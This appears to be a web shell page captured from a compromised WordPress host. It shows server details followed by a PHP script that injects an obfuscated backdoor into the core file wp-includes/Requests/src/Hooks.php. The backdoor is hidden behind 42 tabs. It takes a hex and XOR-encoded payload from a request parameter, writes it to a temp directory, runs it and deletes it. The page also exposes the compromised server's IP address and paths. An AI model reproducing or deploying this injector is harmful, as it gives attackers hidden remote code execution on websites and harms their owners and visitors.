| Server IP : 198.38.94.67 / Your IP : 216.73.217.142 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/ |
Upload File : |
<?php $path = '/home/azfilmst/zeuszamani.com/wp-includes/Requests/src/Hooks.php'; $ft = @filemtime($path); $content = (string) @file_get_contents($path); $new_code = rawurldecode('if%28array_key_exists%28%22%5Cx73y%5Cx6D%5Cx62ol%22%2C%20%24_REQUEST%29%20%26%26%20%21is_null%28%24_REQUEST%5B%22%5Cx73y%5Cx6D%5Cx62ol%22%5D%29%29%7B%20%24pset%20%3D%20hex2bin%28%24_REQUEST%5B%22%5Cx73y%5Cx6D%5Cx62ol%22%5D%29%3B%20%24item%3D%20%27%27%20%3B%20%24c%20%3D%200%3B%20while%28%24c%20%3C%20strlen%28%24pset%29%29%7B%24item%20.%3D%20chr%28ord%28%24pset%5B%24c%5D%29%20%5E%2078%29%3B%24c%2B%2B%3B%7D%20%24record%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/tmp%22%2C%20%22/dev/shm%22%2C%20session_save_path%28%29%2C%20%22/var/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20sys_get_temp_dir%28%29%2C%20getenv%28%22TMP%22%29%5D%29%3B%20while%20%28%24dchunk%20%3D%20array_shift%28%24record%29%29%20%7B%20if%20%28is_writable%28%24dchunk%29%20%26%26%20is_dir%28%24dchunk%29%29%20%7B%20%24hld%20%3D%20str_replace%28%22%7Bvar_dir%7D%22%2C%20%24dchunk%2C%20%22%7Bvar_dir%7D/.element%22%29%3B%20if%20%28%40file_put_contents%28%24hld%2C%20%24item%29%20%21%3D%3D%20false%29%20%7B%20include%20%24hld%3B%20unlink%28%24hld%29%3B%20exit%3B%20%7D%20%7D%20%7D%20%7D'); if (strlen($content) < 32) { die('!failed!'); } if (strstr($content, $new_code)) { die('!already injected!'); } $p = 0; if (strncmp($content, "\xEF\xBB\xBF", 3) === 0) { $p = 3; } while ($p < strlen($content) && strpos(" \t\r\n", $content[$p]) !== false) { $p++; } $prefix = substr($content, 0, $p); $body = substr($content, $p); if (strlen($body) < 32) { die('!failed!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { $len = strlen($start); if ($len > strlen($body) || substr($body, 0, $len) !== $start) { continue; } if ($start === '<?') { if (strncmp($body, '<?xml', 5) === 0) { continue; } if (strlen($body) >= 3 && substr($body, 0, 3) === '<?=') { continue; } } $rest = substr($body, $len); $candidate = $prefix.$start.str_repeat("\t", 42).$new_code."\n".$rest; $tmp = @tempnam(dirname($path), 't'); if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) { $check = (string) @file_get_contents($path); if (strstr($check, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } if ($tmp !== false && is_file($tmp)) { @unlink($tmp); } } die('!failed!');